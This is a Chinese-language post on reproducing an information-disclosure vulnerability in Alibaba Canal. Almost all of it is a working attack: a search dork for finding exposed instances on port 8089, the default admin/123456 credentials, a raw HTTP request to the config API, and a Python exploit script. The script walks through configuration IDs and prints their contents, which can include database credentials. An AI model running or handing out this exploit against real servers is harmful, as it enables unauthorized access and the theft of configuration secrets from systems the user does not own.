阿里巴巴Canal信息泄露漏洞 复现

“Canal” +port:”8089″ 

默认账号 ：admin/123456

GET /api/v1/canal/config/1/0 HTTP/1.1
Host:192.168.1.71:8089
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

exp:

# coding: utf-8
#author:print("")

import requests
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36'}

proxies = {
    "http": "http://127.0.0.1:8080",
    "https": "http://127.0.0.1:8080"
}

def Get_api(url):
    try:
        #首先获取多少个列表
        url = url + '/api/v1/canal/config/'
        for i in range(1,10):
            data=url+'%s/1'%i
            ret=requests.get(url=data,headers=headers,proxies=proxies).json()
            if not ret['data']['content']:break
            print("获取到第%s 份信息=================="%i)
            print(ret['data']['content'])
            print("获取完成%s 份信息==================" % i)
    except:
        print("不存在漏洞")

if __name__ == '__main__':
    import sys
    try:
        url=sys.argv[1]
        Get_api(url)
    except:
         print("python canal_exp.py http://192.168.1.10:8081")